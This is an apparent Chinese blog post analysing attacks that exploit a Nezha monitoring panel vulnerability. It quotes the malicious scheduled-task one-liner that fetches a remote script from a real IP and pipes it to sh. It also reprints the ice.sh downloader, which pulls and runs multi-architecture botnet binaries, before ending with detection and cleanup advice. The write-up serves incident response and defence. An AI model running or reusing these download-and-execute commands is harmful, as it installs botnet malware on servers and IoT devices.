哪吒监控高危漏洞公开后,开始陆续出现服务器被黑的案例。
在 NodeSeek 社区,有用户发现自己的哪吒面板中出现了一个可疑的计划任务,而这个任务背后,指向了一台位于捷克布拉格的服务器。
原帖:
https://www.nodeloc.com/t/topic/94234/4经过进一步分析,我发现这并非普通的 PoC(漏洞验证代码),而是一套真实的恶意载荷投放基础设施。
用户在哪吒监控后台发现如下任务:
任务名称:
auto-poc-uid执行命令:
(wget -O- http://86.54.82.179/ice.sh||curl -sL http://86.54.82.179/ice.sh)|sh其含义是:
- 使用 wget 下载脚本;
- 如果 wget 不存在,则使用 curl;
- 将下载内容直接交给 Shell 执行;
- 不在本地保存文件。
这类写法经常出现在木马下载器、挖矿程序以及僵尸网络传播脚本中。
根据社区流出的内容,ice.sh 的主要逻辑如下:
#!/bin/shcd /tmp 2>/dev/null||cd /var/run 2>/dev/null||cd /mnt 2>/dev/null||cd /for a in x86 mips mpsl arm arm5 arm6 arm7 ppc m68k sh4 spc; do(wget http://86.54.82.179/bins/frosty.$a -O b ||curl -o b http://86.54.82.179/bins/frosty.$a ||tftp -gr frosty.$a 86.54.82.179 ||ftpget -u anonymous -p anonymous -P 21 86.54.82.179 frosty.$a b)chmod 777 b./bdone
脚本逻辑并不复杂:
- 进入临时目录;
- 根据 CPU 架构下载对应程序;
- 赋予执行权限;
- 直接运行。
真正值得关注的不是 ice.sh 本身,而是它下载的文件:
frosty.x86
frosty.arm
frosty.mips
frosty.ppc
frosty.sh4
......换句话说,ice.sh 只是一个下载器。
真正的恶意逻辑隐藏在 frosty 系列二进制文件中。
脚本支持大量 CPU 架构:
x86
arm
arm5
arm6
arm7
mips
ppc
m68k
sh4这意味着攻击目标并不仅仅是云服务器。
同时覆盖:
- VPS
- 路由器
- NAS
- 摄像头
- 工控设备
- 嵌入式 Linux 设备
这种设计方式与 Mirai、Gafgyt 等 IoT 僵尸网络家族十分相似。
攻击者显然希望感染尽可能多的 Linux 设备。
脚本中的下载地址为:
86.54.82.179根据查询结果,该 IP 位于捷克布拉格。
更有意思的是,对同网段地址进行测试发现:
86.54.82.168
86.54.82.171
86.54.82.174
86.54.82.182
86.54.82.189
86.54.82.191均能够正常响应 Ping。
唯独:
86.54.82.179已经失联。
为了进一步分析脚本内容,我们尝试直接访问:
http://86.54.82.179/ice.sh结果:
curl: (28) Failed to connect to server随后进一步测试:
Test-NetConnection 86.54.82.179 -Port 80返回:
PingSucceeded : FalseTcpTestSucceeded : False
说明:
- ICMP 不通;
- TCP 80 不通;
- Web 服务无法访问。
从现有情况看,这台服务器已经离线,或者至少已经停止对外提供服务。
存在几种可能:
1. 服务商封禁
当恶意样本被公开后:
- 安全厂商
- 社区用户
- VPS 服务商
都有可能收到举报,最终导致服务器被停机。
2. 攻击者主动撤离
攻击者发现 IP 暴露后:
- 删除木马文件;
- 关闭 Web 服务;
- 更换新的基础设施;
这是恶意软件运营者最常见的做法。
3. VPS 已被销毁
很多木马投放节点本身就是临时机器。
几美元一个月,用完即弃。
此次事件至少证明了几点:
第一,针对哪吒监控漏洞的利用已经出现真实案例。
第二,攻击者并非只是在验证漏洞,而是在尝试通过计划任务持续投放恶意程序。
第三,攻击目标很可能不仅限于 VPS,而是覆盖大量 Linux 与 IoT 设备。
第四,即使恶意服务器已经下线,也不代表风险结束。
攻击者完全可以:
更换 IP
更换域名
重新部署
继续传播因此,对于仍在使用旧版本哪吒监控的用户来说,升级只是开始。
更重要的是检查:
- 计划任务
- 系统进程
- SSH 公钥
- 启动项
- Agent 节点
确认服务器是否已经遭到植入。
个人观点 仅供参考!
本文来自网络,不代表王道测评立场,如有争议请发邮件:enofun@foxmail.com
AD:【本站QQ交流群】114135944
评论